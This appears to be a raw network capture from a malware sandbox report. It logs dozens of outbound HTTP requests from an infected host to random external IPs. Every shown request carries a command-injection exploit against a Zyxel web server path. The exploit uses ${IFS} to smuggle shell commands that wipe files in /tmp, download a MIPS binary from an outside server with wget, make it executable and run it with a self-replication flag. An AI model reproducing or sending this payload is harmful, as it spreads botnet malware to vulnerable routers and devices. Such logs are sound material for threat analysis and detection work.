                                      Jan 14, 2024 15:51:05.755958080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9352192.168.2.1437260194.246.52.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755992889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9353192.168.2.1453870138.231.84.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756053925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9354192.168.2.145906484.191.181.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756104946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9355192.168.2.145077875.16.38.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756150007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9356192.168.2.14492108.231.5.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756172895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9357192.168.2.1457566193.151.29.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756217003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9358192.168.2.1442634143.149.3.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756267071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9359192.168.2.1452292135.132.178.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756308079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9360192.168.2.1449680204.27.62.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756361008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9361192.168.2.143643840.39.120.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756409883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9362192.168.2.1439346135.189.196.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756441116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9363192.168.2.1446272132.91.191.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756475925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9364192.168.2.145539091.45.202.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756524086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9365192.168.2.1459224174.12.204.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756565094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9366192.168.2.1449688221.8.165.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756581068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9367192.168.2.1432908117.214.82.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756633997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9368192.168.2.1454634118.127.169.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756654024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9369192.168.2.1440744118.171.180.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756691933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9370192.168.2.143377272.117.234.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756755114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9371192.168.2.1433152102.129.105.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756779909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9372192.168.2.1451898115.46.99.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756844997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9373192.168.2.1446934115.143.65.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756887913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9374192.168.2.1452738145.243.27.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756910086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9375192.168.2.143889277.45.206.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.756932974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9376192.168.2.1436676212.30.180.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757003069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9377192.168.2.1453430202.225.201.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757050991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9378192.168.2.143331283.182.11.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757086992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9379192.168.2.1450254172.113.159.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757124901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9380192.168.2.1442640196.0.4.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757145882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9381192.168.2.1449826143.114.131.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757198095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9382192.168.2.1433484116.225.22.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757250071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9383192.168.2.14398805.21.176.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757287979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9384192.168.2.1432778153.239.29.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757355928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9385192.168.2.1436502220.116.204.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757386923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9386192.168.2.145929094.220.154.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757445097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9387192.168.2.145631044.49.63.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757498026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9388192.168.2.145793843.28.121.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757523060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9389192.168.2.143911470.191.18.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757541895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9390192.168.2.1454360143.199.21.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757592916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9391192.168.2.145195259.26.167.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757622957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9392192.168.2.143460617.132.102.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757689953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9393192.168.2.1440756216.140.93.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757729053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9394192.168.2.1450898184.236.80.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757756948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9395192.168.2.145023080.224.251.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757806063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9396192.168.2.14504408.39.143.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757838011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9397192.168.2.145886638.97.33.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757895947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9398192.168.2.1447846190.82.122.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757921934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9399192.168.2.1444676190.214.173.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757950068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9400192.168.2.1455936185.151.95.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.757988930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9401192.168.2.145538238.41.209.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758018970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9402192.168.2.1434274101.20.187.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758073092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9403192.168.2.146024636.113.168.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758099079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9404192.168.2.145269676.59.34.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758136034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9405192.168.2.144149087.159.99.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758182049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9406192.168.2.1434312136.72.34.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758203983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9407192.168.2.1445058174.215.167.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758264065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9408192.168.2.1446950158.98.230.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758308887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9409192.168.2.1434762197.248.199.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758362055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9410192.168.2.145382680.216.113.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758394003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9411192.168.2.1451520199.62.143.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758420944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9412192.168.2.1434280123.161.138.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758472919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9413192.168.2.1439374177.178.81.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.758529902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9414192.168.2.143824831.82.210.197443
                                      TimestampBytes transferredDirectionData
